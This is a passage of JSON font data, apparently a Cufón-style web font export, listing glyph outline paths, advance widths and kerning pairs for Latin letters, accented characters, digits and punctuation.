":-319}},{"d":"977,-730v214,39,368,224,284,464v-29,82,-109,159,-181,192v-86,40,-190,64,-346,61r-170,-4v-72,0,-158,3,-257,10v-28,1,-106,4,-234,9r2,-80v48,-12,127,-19,164,-37v32,-55,26,-106,26,-209r-2,-425v-3,-18,2,-331,-17,-438v-13,-18,-32,-20,-70,-23v-13,-1,-45,-4,-98,-11r-3,-71r614,-18v276,-11,526,53,526,315v0,97,-46,151,-109,199v-19,13,-62,35,-129,66xm532,-1211r7,304r0,150v27,4,58,6,94,6v193,-2,304,-57,304,-247v0,-184,-196,-256,-405,-213xm672,-93v207,-1,321,-84,324,-286v2,-137,-73,-223,-157,-261v-50,-22,-221,-38,-300,-19r-1,271r3,230v1,11,4,23,10,38v43,18,84,27,121,27","w":1387,"k":{"\u00dc":20,"\u00c5":20,"\u00c4":20,"U":20,"A":20}},{"d":"404,-464v-8,22,-85,207,-106,307v4,56,41,51,102,64v6,1,30,5,71,11v0,38,3,46,-1,73v-41,0,-140,-6,-296,-17v-63,12,-133,21,-200,19r2,-68v28,-9,153,-29,160,-42v11,-8,29,-26,41,-58r439,-1151r108,1r183,430v39,87,73,173,106,255r136,342v14,37,56,143,85,177v35,25,98,20,146,43v5,35,6,41,4,71v-94,1,-230,-15,-323,-14v-53,0,-91,1,-114,2r-219,11v0,-23,1,-46,3,-67v48,-11,138,-26,169,-44v14,-13,13,-31,5,-50r-119,-294xm444,-569r301,2v-33,-101,-115,-303,-156,-388","w":1344,"k":{"y":20,"w":20,"v":39,"Y":20,"W":23,"V":115,"U":39}},{"d":"124,-422v-147,-487,197,-908,667,-908v163,0,310,16,438,50v10,29,77,211,72,307r-91,0v-110,-151,-210,-255,-426,-255v-103,0,-187,40,-250,121v-86,109,-129,262,-129,457v0,226,36,320,113,433v54,80,175,134,298,134v196,0,307,-129,409,-273v25,-5,57,-7,97,-8v-8,68,-16,141,-36,206r-23,77v-184,131,-671,123,-863,-2v-135,-88,-230,-185,-276,-339","w":1387,"k":{".":-55,",":-55}},{"d":"236,-1324v102,-18,168,49,165,149v-7,229,-58,578,-96,788v-14,1,-39,2,-76,3r-57,-372v-20,-145,-33,-251,-40,-317v-13,-127,-6,-231,104,-251xm275,18v-81,0,-149,-66,-149,-144v0,-79,83,-143,146,-143v77,0,143,67,143,144v0,80,-60,143,-140,143","w":533},{"d":"839,-1329v36,0,36,49,27,76v-99,28,-221,69,-299,128v-184,140,-252,366,-252,666v0,169,11,308,86,382v27,26,104,35,144,16v102,-46,120,-162,120,-301v0,-121,-17,-204,-51,-249v-54,-71,-116,-84,-212,-51r0,-67v42,-17,121,-47,175,-46v195,5,324,166,324,380v0,256,-167,420,-427,417v-201,-2,-308,-139,-367,-282v-106,-257,-12,-591,119,-748v94,-112,245,-214,377,-264v103,-39,183,-57,236,-57"},{"d":"72,-324v-3,-64,4,-111,1,-173r3,-17r475,-2v22,0,42,1,61,4v8,62,4,121,2,187","w":683},{"d":"345,-1113v-86,59,-128,97,-252,147v-21,-32,-35,-56,-41,-72v147,-75,172,-96,280,-191v21,-19,47,-49,79,-89r163,0v10,109,1,292,0,431r-7,732v4,57,24,53,89,65v16,3,48,7,96,16v4,25,1,29,0,67v-64,2,-172,-9,-241,-7r-223,6v-54,-1,-90,-4,-147,1v-3,-31,-3,-36,0,-67v43,-14,162,-31,183,-52v34,-35,6,-117,19,-180r-2,-191v7,-82,5,-155,5,-246v0,-95,-4,-118,-4,-200v0,-53,4,-105,3,-170","w":811},{"d":"646,-398v0,-135,-79,-256,-190,-256v-35,0,-75,15,-121,46v-20,-25,-36,-45,-49,-60v121,-88,202,-160,243,-215v27,-35,40,-74,40,-115v0,-81,-73,-158,-151,-158v-81,0,-155,50,-222,149r-63,-34v64,-133,99,-190,227,-247v43,-19,97,-28,162,-28v159,0,271,87,273,230v0,52,-16,102,-49,150v-33,48,-91,99,-174,156v192,-17,324,160,324,328v0,180,-84,320,-222,404v-142,87,-450,104,-585,13v-40,-27,-60,-58,-60,-94v0,-80,106,-122,173,-74v31,10,95,117,141,136v31,13,53,19,67,19v162,-10,236,-165,236,-350"},{"d":"-12,154r1048,0r0,102r-1048,0r0,-102","w":1024},{"d":"770,-1171v56,0,66,-30,81,-89r58,1v3,150,-79,256,-209,263v-107,6,-213,-86,-308,-86v-59,0,-71,28,-87,84r-59,1v-12,-140,84,-257,205,-261v116,-4,213,87,319,87xm387,-717v93,-83,185,-132,320,-137v118,-5,230,71,258,154v36,107,18,408,18,572v0,15,3,28,8,38v12,10,76,18,104,24v12,17,9,36,8,65v-85,-4,-166,-12,-254,-12v-76,0,-137,11,-212,10v-2,-23,-1,-36,1,-59v17,-6,119,-6,126,-33v22,-88,4,-213,7,-310v4,-141,-9,-228,-26,-263v-43,-90,-140,-89,-230,-46v-40,19,-81,47,-124,86v-4,46,-2,98,-1,147r4,160v-5,86,2,207,11,209v9,14,42,29,99,46v5,29,4,31,-4,62v-162,-2,-262,-14,-456,0v-6,-18,-4,-25,-3,-53v44,-26,125,-12,132,-53v19,-110,4,-285,4,-414v0,-64,5,-107,-35,-133v-19,-13,-50,-26,-95,-39r-1,-48v80,-19,172,-41,218,-82v18,-16,44,-38,72,-73r53,-4","w":1131},{"d":"537,-649v-11,131,9,274,1,410r4,99v29,32,131,45,176,76v4,26,4,29,1,55r-120,1v-146,-10,-292,-6,-449,-7v-7,0,-39,1,-95,3r-1,-56v68,-35,128,-59,179,-74v47,-38,25,-58,32,-189v1,-13,-4,-65,-3,-96r2,-446v0,-85,6,-234,-14,-297v-30,-30,-146,-49,-192,-75r7,-62v164,-8,299,11,482,11v82,0,120,-11,187,-8v6,17,2,54,0,66v-53,24,-147,33,-187,51v-22,21,-14,74,-13,114r4,136r-3,229v117,-104,301,-299,422,-425v27,-45,56,-58,36,-72v-81,-16,-89,-7,-161,-27v-1,-10,-3,-48,-1,-72v62,-3,151,10,209,9r241,-4v38,-4,80,-8,126,-11r-1,79v-133,31,-237,65,-312,127v-45,37,-321,292,-338,314r101,110r212,245r233,288v40,54,66,29,150,76v3,30,3,34,-2,65r-110,-2v-161,-18,-355,-6,-517,0v-8,-25,-5,-32,-1,-62v40,-17,103,-21,134,-42v27,-33,0,-64,-23,-90","w":1387,"k":{"\u00fc":-37,"\u00f6":-37,"\u00e5":-55,"\u00e4":-55,"\u00d6":20,"y":20,"w":39,"v":39,"u":-37,"o":-37,"e":-37,"a":-55,"O":20,"G":20,"C":20}},{"d":"766,-254v0,173,-145,277,-343,271v-38,-1,-158,-11,-214,-30v-4,-3,-72,-20,-89,-43v-8,-21,-31,-230,-30,-230v32,-6,37,-7,65,-5v83,125,92,173,221,224v118,47,272,-55,206,-171v-47,-45,-85,-53,-194,-80v-124,-32,-134,-30,-204,-83v-75,-56,-104,-197,-60,-295v42,-94,139,-157,275,-159v118,-1,215,14,289,52v4,24,36,193,25,219v-31,9,-39,10,-72,6v-57,-97,-104,-205,-239,-204v-75,0,-156,40,-150,119v6,69,71,102,158,120v157,33,255,67,320,157v26,37,36,82,36,132","w":853,"k":{"w":37}},{"d":"745,-148v-96,81,-171,163,-318,164v-107,1,-196,-50,-230,-118v-43,-86,-29,-153,-29,-340v0,-65,5,-114,5,-145v0,-78,6,-97,-13,-137v-40,-22,-133,-2,-116,-59v1,-7,2,-18,3,-33v7,-3,13,-5,18,-6r320,2r-1,470v-3,149,10,241,141,248v86,5,143,-43,184,-79v22,-19,33,-41,40,-59r9,-313r-4,-169v-28,-20,-87,-20,-134,-24v-14,-1,-15,-28,-15,-37v0,-8,1,-19,3,-34v122,-12,224,3,363,-5r-1,592v-3,35,-4,54,-4,59v-1,25,10,48,26,49v34,2,72,-5,104,-1v3,41,5,33,0,62v-133,6,-190,40,-310,78r-40,-2xm459,-959v21,-73,55,-180,102,-321r274,3r-301,319v-45,1,-42,2,-75,-1","w":1131},{"d":"921,-342r-49,338r-202,-2v-52,5,-90,-3,-145,-2r-159,4r-101,-2r-226,2r0,-68v95,-120,166,-204,213,-252v70,-72,278,-312,330,-441v76,-189,22,-416,-181,-416v-153,1,-223,127,-238,261r-73,0v-2,-29,-3,-53,-3,-72v0,-191,195,-324,402,-324v259,0,439,208,359,463v-15,49,-39,91,-66,125v-103,130,-343,360,-524,522r111,2r182,-4v67,1,183,6,217,-16v28,-19,49,-82,69,-133v29,2,82,-17,84,15"},{"d":"979,-1304v135,15,287,3,404,-8r-1,68v-118,50,-146,34,-178,97v-126,246,-258,653,-376,941r-10,18v-29,94,-51,159,-66,195v-27,1,-43,2,-50,2v-13,0,-30,-1,-53,-2r-107,-278r-189,-424r-113,-273v-58,-124,-90,-190,-95,-199v-31,-42,-47,-45,-125,-53r-43,-5r0,-86v35,1,56,1,63,2v137,16,381,21,544,-2r73,0v1,49,2,76,2,82v-114,16,-129,11,-182,49v-31,43,11,96,24,135v63,190,208,472,290,677r58,-142r119,-330v31,-66,63,-189,84,-247v17,-47,33,-80,-1,-108v-32,-27,-118,-30,-173,-41v-10,-33,-6,-34,-2,-76v12,0,46,2,103,8","w":1365,"k":{"\u00e5":188,"\u00d6":57,"\u00c5":94,"\u00c4":94,"y":57,"u":76,"r":115,"o":170,"i":20,"e":170,"a":188,"Q":57,"O":57,"G":57,"C":57,"A":94,";":76,":":76,".":248,"-":94,",":227}},{"d":"460,-833v160,-36,295,15,419,93v5,-19,9,-75,14,-168r85,-1r2,393r-4,249r2,183r-6,445v7,48,33,52,93,70v25,7,41,14,50,19v3,24,2,29,0,59v-170,-7,-347,-25,-509,0v-5,0,-12,0,-21,-1r4,-60v49,-11,138,-17,158,-46v26,-73,16,-278,16,-387v0,-22,-1,-56,-2,-103v-102,77,-250,129,-398,86v-196,-57,-355,-305,-255,-553v61,-151,169,-237,352,-278xm317,-441v0,181,110,313,267,330v80,9,119,-4,178,-42r-1,-157v0,-161,-6,-264,-14,-310v-21,-117,-146,-171,-277,-122v-98,37,-153,151,-153,301","w":1131},{"d":"263,-916r4,-173v0,-9,-1,-36,-2,-83v-31,-17,-152,-35,-211,-49v-4,-29,-4,-45,-2,-75r437,2v7,135,-3,274,-1,412r3,228r-4,226v0,19,2,53,2,104r-3,482r2,87v-1,63,-5,68,0,146v2,25,2,43,-3,67r-442,1v1,-26,-5,-56,5,-71v60,-21,198,-43,202,-58v8,-5,12,-14,13,-27r-2,-445r4,-571","w":747},{"d":"635,14v-131,0,-165,-25,-250,-66r1,388v-13,100,73,88,145,107v12,15,9,33,8,61v-164,-3,-315,-26,-477,-5v-32,4,-43,5,-65,3r0,-45v41,-29,130,-43,157,-73v11,-20,15,-55,14,-106r-17,-893v-9,-96,-33,-91,-129,-125r-1,-52v141,-30,186,-48,298,-123r51,-1r1,166v110,-68,175,-92,324,-94v183,-2,299,133,343,272v26,83,21,232,-10,306v-60,141,-191,280,-393,280xm778,-160v117,-209,26,-546,-235,-542v-49,0,-104,13,-166,38v-6,66,-1,342,-1,451v0,184,306,183,390,67v3,-3,7,-8,12,-14","w":1131,"k":{"y":35,"w":20,".":35,",":37}},{"d":"281,-1066v-78,0,-129,-52,-129,-129v0,-75,58,-130,136,-128v66,1,121,51,121,126v0,73,-56,131,-128,131xm394,-901r9,605r-1,368v-6,132,-61,204,-144,286v-52,50,-100,87,-145,112r-54,-48v35,-47,111,-149,119,-183v23,-97,11,-387,9,-533r-5,-373v-4,-9,-9,-14,-15,-16v-25,-9,-66,-19,-122,-28r-1,-54v182,-26,149,-34,301,-138","w":533},{"d":"5,-418r179,-187v92,-98,159,-167,201,-208v47,1,84,3,110,4v-32,73,-164,283,-224,389v52,77,163,272,225,393v-33,4,-69,0,-104,2v-154,-150,-283,-281,-387,-393xm424,-417v9,-11,87,-97,235,-259r120,-136r98,2r-175,366v-3,10,-6,18,-8,25r113,222v30,71,52,103,75,170r-99,0r-146,-163","w":939},{"d":"43,-769v164,-19,206,-51,296,-133r62,1v12,105,10,124,8,246r-7,539v0,7,1,15,4,22v25,6,71,16,140,29v5,27,5,30,1,57r-247,-6v-109,0,-172,1,-190,2v-51,5,-53,8,-76,5r-1,-64v23,-5,121,-13,131,-22v35,-35,28,-58,27,-165r-5,-377v8,-87,-73,-64,-143,-83r0,-51xm67,-1280r273,0v16,41,34,103,47,143v31,90,49,149,56,178r-79,-3","w":576},{"d":"81,-273v0,-80,92,-116,147,-65v39,36,52,165,99,200v28,21,59,38,101,44r2,-456v-179,-80,-334,-140,-334,-352v0,-190,149,-306,338,-319r1,-79r90,-1v1,28,-1,57,3,82v108,10,195,39,260,99v43,40,64,85,64,136v0,71,-82,115,-136,68v-29,-25,-38,-138,-67,-163v-33,-29,-72,-48,-122,-51v-3,17,-2,342,-1,358v175,79,369,148,369,392v0,199,-151,349,-335,375v-15,2,-27,5,-38,8r-2,189r-90,1r-1,-191v-109,-9,-193,-43,-255,-100v-62,-57,-93,-116,-93,-175xm433,-1126v-86,6,-155,65,-156,150v-1,88,84,143,154,164xm522,-96v97,-6,185,-97,185,-199v0,-110,-95,-188,-181,-213v-5,56,-2,83,-2,136"},{"d":"179,-699v-45,-8,-115,18,-122,-20v0,-4,1,-19,2,-45v164,-72,196,-104,283,-254r56,0v20,65,2,147,6,218v45,3,98,-4,192,-5v9,40,8,62,-1,102v-67,10,-129,-3,-200,3r-2,382v2,120,-7,135,28,191v15,7,32,11,51,11v55,3,63,-23,103,-48v19,17,36,26,43,50v-41,68,-131,118,-234,118v-136,0,-212,-91,-209,-242r4,-176r0,-285","w":640},{"d":"848,-1426r166,0r-731,1703r-166,0","w":1131},{"d":"461,-675v-55,15,-77,104,-71,170v5,49,3,165,6,347v0,17,8,33,19,50v31,23,45,26,101,30v61,4,75,17,60,69v-197,-1,-336,-17,-537,1v-4,-22,-4,-25,0,-47v38,-25,92,-26,131,-56v17,-83,6,-466,-2,-504v-7,-36,-43,-41,-84,-51v-26,-6,-25,-31,-27,-59v92,-9,183,-76,224,-133v11,-15,20,-27,28,-35r70,-3v12,79,-1,102,4,206v55,-88,41,-84,113,-143v78,-64,208,1,208,94v0,61,-44,125,-108,122v-41,9,-99,-52,-135,-58","w":704,"k":{"\u00fc":-68,"\u00f6":-20,"y":-86,"v":-86,"u":-68,"t":-68,"s":-35,"r":-68,"p":-68,"o":-20,"n":-84,"m":-86,"l":-51,"k":-20,"j":-68,"e":-20,":":-20,".":88,"-":23,",":70}},{"d":"143,-786v-134,-290,84,-563,409,-545v91,5,195,23,293,59v16,72,39,227,26,302v-27,6,-65,-2,-94,-4v-29,-88,-59,-148,-88,-179v-51,-53,-110,-80,-179,-80v-119,0,-212,70,-213,179v0,43,20,83,57,123v87,94,415,141,517,258v70,80,105,129,105,263v0,107,-30,216,-96,276v-89,80,-210,147,-397,147v-111,0,-268,-41,-350,-80v-4,-3,-9,-17,-9,-30r-7,-267r92,-2v57,129,59,150,131,216v45,42,117,70,202,69v132,-1,261,-78,263,-211v0,-49,-25,-93,-69,-137v-53,-53,-422,-167,-481,-220v-43,-39,-86,-80,-112,-137","w":1045,"k":{".":-20,",":-39}},{"d":"121,-1280r273,0v16,41,34,103,47,143v31,90,49,149,56,178r-79,-3","w":683},{"d":"134,-916r468,0r0,-470r158,0r0,470r471,0r0,157r-471,0r0,469r-158,0r0,-469r-468,0r0,-157xm134,-108r1097,0r0,157r-1097,0r0,-157","w":1365},{"d":"632,-810v110,0,221,1,331,-10v2,27,3,33,1,56v-36,20,-106,17,-123,51v-31,64,-101,263,-141,359r-167,398v-64,134,-113,291,-204,395v-67,76,-284,59,-284,-53v0,-37,16,-71,47,-102v71,-47,98,-28,167,21v32,22,54,37,72,4v60,-111,95,-193,112,-240r-185,-407v-69,-163,-124,-277,-159,-343v-35,-66,-43,-62,-105,-87r-9,-44v94,-15,183,7,285,1r142,-8v5,4,10,8,14,13v-2,29,-4,48,-5,56r-81,14v-30,5,-8,39,-5,54r48,98v55,138,113,249,173,373v9,-30,184,-447,173,-470v0,-7,-2,-18,-6,-33v-32,-32,-77,-22,-133,-39v-4,-20,-6,-31,-1,-55v20,-1,34,-2,43,-2","k":{"\u00f6":53,"\u00e5":35,"\u00e4":35,"o":53,"g":35,"e":35,"d":35,"c":35,"a":35,".":174,",":158}},{"d":"59,-678v0,-406,304,-709,709,-709v405,0,710,302,710,709v0,407,-302,709,-710,709v-407,0,-709,-302,-709,-709xm1388,-678v0,-355,-265,-620,-620,-620v-354,0,-620,266,-620,620v0,356,265,620,620,620v356,0,620,-264,620,-620xm478,-923v-3,-102,-6,-121,-89,-133r0,-34v197,6,502,-25,616,44v68,41,101,100,101,175v0,112,-76,181,-179,207r137,250v33,51,45,86,105,99r0,34r-242,0r-205,-368r-46,0r0,198v3,113,14,129,120,136r0,34r-423,0r0,-34v100,0,105,-36,105,-136r0,-472xm891,-875v0,-128,-77,-180,-215,-171r0,346v129,28,215,-55,215,-175","w":1536},{"d":"72,-324v-3,-64,4,-111,1,-173r3,-17r475,-2v22,0,42,1,61,4v8,62,4,121,2,187","w":683},{"d":"817,-238v-5,58,7,123,60,98r30,-47r18,-7v13,10,33,16,35,37v-28,99,-59,156,-160,156v-104,0,-139,-57,-179,-147v-56,99,-159,148,-312,153v-149,5,-242,-96,-187,-225v68,-158,310,-197,476,-275v8,-91,0,-225,-30,-261v-52,-63,-198,-15,-223,38v-15,12,-26,113,-37,134v-12,22,-88,47,-108,57v-36,18,-65,26,-86,26v-30,-32,-8,-99,10,-132v42,-72,160,-162,244,-189v91,-30,261,-48,348,2v96,55,99,122,102,296r-3,165xm349,-192v0,52,38,99,86,99v70,0,143,-69,157,-101v9,-20,12,-172,5,-232v-70,23,-195,94,-228,153v-13,22,-20,49,-20,81xm210,-1280r273,0v16,41,34,103,47,143v31,90,49,149,56,178r-79,-3","w":981},{"d":"695,-1171v56,0,66,-30,81,-89r58,1v3,150,-79,256,-209,263v-107,6,-213,-86,-308,-86v-59,0,-71,28,-87,84r-59,1v-12,-140,84,-257,205,-261v116,-4,213,87,319,87xm817,-238v-5,58,7,123,60,98r30,-47r18,-7v13,10,33,16,35,37v-28,99,-59,156,-160,156v-104,0,-139,-57,-179,-147v-56,99,-159,148,-312,153v-149,5,-242,-96,-187,-225v68,-158,310,-197,476,-275v8,-91,0,-225,-30,-261v-52,-63,-198,-15,-223,38v-15,12,-26,113,-37,134v-12,22,-88,47,-108,57v-36,18,-65,26,-86,26v-30,-32,-8,-99,10,-132v42,-72,160,-162,244,-189v91,-30,261,-48,348,2v96,55,99,122,102,296r-3,165xm349,-192v0,52,38,99,86,99v70,0,143,-69,157,-101v9,-20,12,-172,5,-232v-70,23,-195,94,-228,153v-13,22,-20,49,-20,81","w":981},{"d":"395,-314r-298,-4v-10,0,-25,1,-46,2v-4,-48,4,-106,0,-153v98,-186,183,-294,289,-460v49,-77,93,-132,122,-173r153,-215v83,-4,66,-4,145,0r-6,833r111,2v11,0,27,-1,48,-2r0,168v-71,4,-91,4,-159,0v-6,66,3,127,0,197r-6,141r-139,-1v-33,2,-43,-8,-71,1r2,-194v0,-48,-7,-97,-2,-144v-32,1,-80,3,-143,2xm538,-486v13,-192,0,-391,8,-592r-138,189r-184,292v-25,38,-45,75,-62,111v121,-7,247,2,376,0"},{"d":"544,-1135v-64,49,-140,125,-220,190r-79,-3r193,-349r214,0r188,353r-78,1xm817,-238v-5,58,7,123,60,98r30,-47r18,-7v13,10,33,16,35,37v-28,99,-59,156,-160,156v-104,0,-139,-57,-179,-147v-56,99,-159,148,-312,153v-149,5,-242,-96,-187,-225v68,-158,310,-197,476,-275v8,-91,0,-225,-30,-261v-52,-63,-198,-15,-223,38v-15,12,-26,113,-37,134v-12,22,-88,47,-108,57v-36,18,-65,26,-86,26v-30,-32,-8,-99,10,-132v42,-72,160,-162,244,-189v91,-30,261,-48,348,2v96,55,99,122,102,296r-3,165xm349,-192v0,52,38,99,86,99v70,0,143,-69,157,-101v9,-20,12,-172,5,-232v-70,23,-195,94,-228,153v-13,22,-20,49,-20,81","w":981},{"d":"540,-858v212,0,357,113,422,266v49,116,36,273,-10,367v-73,151,-204,238,-411,242v-198,4,-354,-108,-419,-229v-48,-91,-63,-240,-25,-356v44,-135,151,-229,279,-270v45,-14,100,-20,164,-20xm319,-389v0,158,10,170,54,258v40,79,216,114,291,33v72,-78,87,-176,86,-359v0,-121,-22,-205,-60,-257v-62,-85,-204,-101,-286,-33v-34,29,-57,71,-70,127v-9,36,-15,113,-15,231xm427,-959v21,-73,55,-180,102,-321r274,3r-301,319v-45,1,-42,2,-75,-1","w":1067},{"d":"1492,-1164v-19,39,-6,111,-6,163v0,97,6,173,8,229r15,464r0,123r4,208r-115,4r-119,-123r-413,-411r-125,-128r-222,-211r-163,-147r10,442v-1,145,5,279,21,417v1,7,6,17,12,30v26,9,83,15,170,21v6,0,15,4,26,7r4,81v-76,3,-90,-14,-241,-14v-106,0,-177,3,-212,6v-62,4,-48,7,-91,0v-3,-32,-2,-41,-1,-76v44,-11,165,6,184,-15v32,-35,21,-256,25,-262r2,-380v-4,-109,3,-290,-18,-364v-14,-47,-62,-76,-101,-94v-17,-7,-62,-17,-135,-28r-4,-70r197,-4v83,6,164,-2,247,0v103,93,186,174,251,241r708,707r-25,-594v-8,-87,-12,-138,-12,-151v-1,-104,-20,-92,-110,-112v-36,-8,-64,-14,-82,-23r1,-59v70,-7,149,-7,223,-9r262,-7r1,65v-26,17,-112,31,-121,39v-34,19,-52,31,-55,35","w":1728,"k":{"\u00c5":39,"\u00c4":39,"A":39,".":20,",":20}},{"d":"1015,-1607v56,0,66,-30,81,-89r58,1v3,150,-79,256,-209,263v-107,6,-213,-86,-308,-86v-59,0,-71,28,-87,84r-59,1v-12,-140,84,-257,205,-261v116,-4,213,87,319,87xm111,-490v-57,-217,11,-469,125,-594v127,-139,308,-243,573,-243v282,0,487,118,602,289v183,273,128,621,-79,848v-182,200,-589,270,-877,140v-140,-63,-215,-150,-287,-274v-17,-31,-36,-86,-57,-166xm796,-78v288,-9,407,-220,405,-537v0,-64,-7,-199,-26,-277v-49,-200,-175,-336,-404,-336v-199,0,-294,151,-336,312v-36,137,-30,391,10,511v54,162,55,170,150,258v37,34,128,71,201,69","w":1621},{"d":"1067,-21v114,78,231,177,327,222v32,15,78,30,141,41v2,46,3,66,0,104v-212,11,-319,-15,-483,-85v-106,-45,-343,-205,-483,-266v-194,-85,-332,-188,-419,-367v-94,-194,-75,-439,29,-622v106,-186,311,-334,627,-334v305,0,473,121,600,292v106,142,157,404,77,611v-57,145,-140,247,-258,329v-35,24,-88,48,-158,75xm414,-665v0,316,82,592,402,592v49,0,105,-14,166,-47v147,-79,223,-266,223,-526v0,-195,-46,-343,-115,-444v-74,-109,-279,-189,-435,-118v-184,83,-241,294,-241,543","w":1621,"k":{"Y":57,"W":-20,"V":57,"T":20,"A":76,".":94,",":20}},{"d":"539,0v-188,-10,-255,-26,-498,-7r3,-68v154,-30,187,-17,193,-176r30,-758v-8,-194,15,-168,-145,-206v-19,-4,-33,-7,-44,-10v-2,-29,-2,-46,-2,-73v147,-7,307,6,454,11v56,77,86,171,143,294r270,583v38,-69,71,-158,105,-222v65,-126,192,-465,284,-647v104,-24,315,-26,432,-26v7,0,15,1,24,2v2,31,-1,46,-2,79v-63,9,-114,22,-153,42v-33,17,-44,30,-41,65r17,306v4,27,14,487,31,655v1,16,4,26,10,31v6,5,67,24,180,58v2,26,1,42,0,66v-18,0,-63,-3,-136,-11v-177,-20,-350,-12,-521,3r2,-69v35,-20,145,-21,170,-54v14,-10,14,-118,12,-164v-3,-70,1,-168,-6,-292r-24,-457r-307,697v-51,123,-87,218,-107,283v-5,17,-13,38,-24,65r-77,-1v-52,-172,-139,-345,-217,-512r-240,-516r-15,780v-7,141,83,143,199,176r0,73","w":1877},{"d":"15,-1221v2,-33,-9,-53,-3,-80r97,0v26,2,52,5,79,3v115,20,316,17,443,-2v11,1,22,2,35,3v-1,22,-2,44,-2,66v-47,23,-105,15,-153,37v1,12,2,21,4,26v86,148,159,235,245,363v67,-77,124,-165,181,-251v37,-55,53,-74,61,-119r-3,-16v-34,-27,-112,-11,-163,-24v-6,-32,-1,-41,0,-77v7,-1,14,-2,20,-5v51,3,328,13,470,0v7,0,17,1,30,3v6,27,5,36,4,68v-68,20,-151,14,-196,60v-79,80,-251,320,-340,430r127,180r199,294v53,78,92,126,117,144v18,13,64,26,137,40v9,32,-4,34,1,72v-103,7,-220,-11,-326,-14v-115,-3,-242,21,-360,12r2,-63v51,-13,105,-24,161,-33v7,-8,27,-7,26,-25v-3,-31,-11,-40,-31,-73v-57,-95,-165,-229,-238,-328v-15,18,-65,95,-161,222v-33,44,-77,103,-94,155v12,45,60,43,106,61v36,14,60,19,71,23v1,21,8,42,4,62v-72,13,-165,-14,-279,-9r-221,10v-5,0,-20,0,-47,-1v-1,-26,-7,-44,-1,-71v58,-6,130,-14,163,-33v149,-137,276,-330,402,-489v-43,-72,-121,-165,-158,-220r-218,-322v-42,-59,-85,-72,-191,-79","w":1408,"k":{"\u00d6":76,"O":76,"G":76,"C":76}},{"d":"429,-1571v-64,49,-140,125,-220,190r-79,-3r193,-349r214,0r188,353r-78,1xm658,-4v-141,-23,-411,-25,-576,-2r0,-72v37,-11,138,-33,163,-50v27,-44,17,-134,17,-204r1,-282v5,-132,7,-200,7,-204r-2,-133v6,-70,-3,-140,-3,-211v-1,-7,-3,-17,-7,-32v-28,-16,-109,-22,-168,-27r-3,-88r352,14v39,2,225,-10,281,-14v2,31,1,43,-1,76v-47,18,-131,34,-176,52v-8,29,-3,110,-3,145v0,113,-3,199,-3,260r1,264r-3,134r1,238v0,5,1,13,4,23v74,15,92,15,172,26v5,37,5,46,3,84","w":811},{"d":"234,-988v-7,-214,26,-226,-153,-226v-17,0,-31,-1,-42,-3r-3,-79v72,-5,264,10,297,9r373,-10v-2,25,1,52,1,79v-37,5,-76,8,-116,8v-95,0,-82,17,-86,141r2,88v-2,60,4,118,4,174v0,145,1,285,9,424v7,128,49,217,138,264v167,88,419,29,497,-86v62,-91,67,-144,69,-308v2,-172,-30,-390,-30,-598v0,-116,-83,-115,-188,-108r-13,-3r2,-76r79,0v123,6,255,13,374,-1r17,2v6,38,9,43,2,73v-34,13,-138,17,-152,28v-9,8,-14,20,-14,37v1,44,4,75,6,139r7,242v8,202,29,476,-42,585v-93,141,-270,223,-513,220v-278,-4,-471,-89,-511,-326v-31,-184,-7,-472,-14,-689","w":1557,"k":{"\u00c5":170,"\u00c4":170,"A":170,".":152,",":133}},{"d":"696,-1571v-64,49,-140,125,-220,190r-79,-3r193,-349r214,0r188,353r-78,1xm404,-464v-8,22,-85,207,-106,307v4,56,41,51,102,64v6,1,30,5,71,11v0,38,3,46,-1,73v-41,0,-140,-6,-296,-17v-63,12,-133,21,-200,19r2,-68v28,-9,153,-29,160,-42v11,-8,29,-26,41,-58r439,-1151r108,1r183,430v39,87,73,173,106,255r136,342v14,37,56,143,85,177v35,25,98,20,146,43v5,35,6,41,4,71v-94,1,-230,-15,-323,-14v-53,0,-91,1,-114,2r-219,11v0,-23,1,-46,3,-67v48,-11,138,-26,169,-44v14,-13,13,-31,5,-50r-119,-294xm444,-569r301,2v-33,-101,-115,-303,-156,-388","w":1344},{"d":"43,-769v164,-19,206,-51,296,-133r62,1v12,105,10,124,8,246r-7,539v0,7,1,15,4,22v25,6,71,16,140,29v5,27,5,30,1,57r-247,-6v-109,0,-172,1,-190,2v-51,5,-53,8,-76,5r-1,-64v23,-5,121,-13,131,-22v35,-35,28,-58,27,-165r-5,-377v8,-87,-73,-64,-143,-83r0,-51xm476,-1001v-63,0,-123,-57,-123,-118v0,-72,53,-130,123,-130v67,0,124,57,124,124v0,68,-56,124,-124,124xm15,-1124v0,-67,57,-125,129,-125v62,0,118,61,118,125v0,67,-57,124,-124,124v-68,0,-123,-56,-123,-124","w":576},{"d":"404,-464v-8,22,-85,207,-106,307v4,56,41,51,102,64v6,1,30,5,71,11v0,38,3,46,-1,73v-41,0,-140,-6,-296,-17v-63,12,-133,21,-200,19r2,-68v28,-9,153,-29,160,-42v11,-8,29,-26,41,-58r439,-1151r108,1r183,430v39,87,73,173,106,255r136,342v14,37,56,143,85,177v35,25,98,20,146,43v5,35,6,41,4,71v-94,1,-230,-15,-323,-14v-53,0,-91,1,-114,2r-219,11v0,-23,1,-46,3,-67v48,-11,138,-26,169,-44v14,-13,13,-31,5,-50r-119,-294xm444,-569r301,2v-33,-101,-115,-303,-156,-388xm566,-1395v21,-73,55,-180,102,-321r274,3r-301,319v-45,1,-42,2,-75,-1","w":1344},{"d":"93,-301v0,-228,198,-334,358,-403v-75,-92,-97,-91,-127,-182v-63,-191,80,-329,249,-363v16,-3,49,-7,102,-7v203,0,369,155,284,346v-20,46,-134,119,-182,136v-9,3,-15,7,-19,12v26,36,105,107,153,165r147,179v53,-52,110,-126,124,-201v-4,-40,-33,-61,-75,-76r4,-63v127,-29,264,-20,411,-34v-3,25,-4,54,-9,77v-122,59,-115,59,-219,166v-33,35,-91,105,-174,210v33,53,106,123,150,152v43,28,82,39,126,22v30,-11,81,-82,117,-92v26,-1,52,21,48,46v-21,123,-123,238,-291,232v-161,-6,-222,-70,-333,-162v-133,109,-279,163,-438,163v-245,0,-406,-110,-406,-323xm736,-1144v-82,-49,-209,-7,-209,95v0,26,9,53,27,81v23,37,67,81,131,134v69,-35,112,-68,111,-172v0,-21,-6,-53,-19,-96v-5,-15,-18,-28,-41,-42xm517,-632v-107,38,-199,152,-142,287v39,92,79,137,161,181v116,62,236,27,327,-59v-50,-70,-107,-132,-161,-198v-60,-74,-122,-144,-185,-211","w":1643},{"d":"150,-666r411,-718r82,0r404,718r-159,0r-295,-512r-290,512r-153,0","w":1195},{"d":"111,-490v-57,-217,11,-469,125,-594v127,-139,308,-243,573